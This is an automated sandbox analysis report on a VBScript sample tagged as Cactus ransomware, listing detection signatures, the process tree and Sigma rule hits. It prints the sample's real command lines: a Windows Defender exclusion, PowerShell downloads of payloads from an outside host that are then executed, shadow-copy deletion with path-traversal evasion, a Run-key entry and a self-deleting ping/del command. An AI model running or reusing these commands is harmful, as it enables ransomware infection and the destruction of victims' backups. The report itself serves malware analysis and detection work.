Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs

Overview

General Information

Sample name:NOTIFICATION_OF_DEPENDANTS.vbs
Analysis ID:1578028
MD5:78d392dbb4dacec38ea4f6efaeb62797
SHA1:f2766170575b017fe801c4c98d58dfa1baf0818b
SHA256:8dfebd7977251503d34f06b75d8b76a518c6f07ef52e3724aed9c3d9158a662e
Tags:CactusRansomwarevbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry

Classification

  • System is w10x64
  • wscript.exe (PID: 7716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8124 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)
        • chrome.exe (PID: 7376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 3988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • cmd.exe (PID: 5284 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6276 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5408 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • control.exe (PID: 7848 cmdline: control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
        • rundll32.exe (PID: 7968 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 8044 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)
            • cmd.exe (PID: 1044 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 2440 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 8388 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 8440 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 8612 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • eryy65ty.exe (PID: 8660 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
                • WMIC.exe (PID: 9108 cmdline: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                  • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • WMIC.exe (PID: 9212 cmdline: c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                  • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 9200 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 9204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • PING.EXE (PID: 3896 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • eryy65ty.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
    • WMIC.exe (PID: 8392 cmdline: c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1980 cmdline: c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5680 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1176 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • eryy65ty.exe (PID: 9104 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C)
    • WMIC.exe (PID: 3656 cmdline: c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3756 cmdline: c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3820 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4956 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • notepad.exe (PID: 6192 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

Operating System Destruction

barindex
Source: Process startedAuthor: Joe Security: Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe

System Summary

barindex
Source: Process startedAuthor: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): Data: Command: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5284, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 6276, ProcessName: powershell.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8044, ParentProcessName: rundll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 1044, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe.Rd_03.Qd_.R.T.e..eH.....Y$....g "#.S@S0".3..83.3c/.S/F^".0#.3..3.->^..S/}/.3.3.3.3.3...f 3./.30,3.-083.-0\3J(0.^.3r0...35).-.`S.S.^<-<-.l3.3.-.^.3).....3^S..g..3.3T5..3.S...U<-., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", ProcessId: 9200, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 7716, ProcessName: wscript.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe.Rd_03.Qd_.R.T.e..eH.....Y$....g "#.S@S0".3..83.3c/.S/F^".0#.3..3.->^..S/}/.3.3.3.3.3...f 3./.30,3.-083.-0\3J(0.^.3r0...35).-.`S.S.^<-<-.l3.3.-.^.3).....3^S..g..3.3T5..3.S...U<-., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8660, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete, ProcessId: 9108, ProcessName: WMIC.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 5284, ProcessName: cmd.exe
